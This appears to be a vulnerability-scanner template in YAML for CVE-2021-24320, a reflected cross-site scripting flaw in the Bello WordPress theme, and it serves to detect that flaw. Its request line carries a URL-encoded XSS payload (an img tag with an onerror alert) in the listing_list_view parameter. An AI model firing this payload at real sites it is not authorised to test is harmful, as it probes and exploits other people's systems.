31 lines
1.1 KiB
YAML
31 lines
1.1 KiB
YAML
id: CVE-2021-24320
|
|
|
|
info:
|
|
name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
|
|
author: daffainfo
|
|
severity: medium
|
|
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
|
|
tags: cve,cve2021,wordpress,xss,wp-plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<img src=x onerror=(alert)(123);>"
|
|
part: body
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|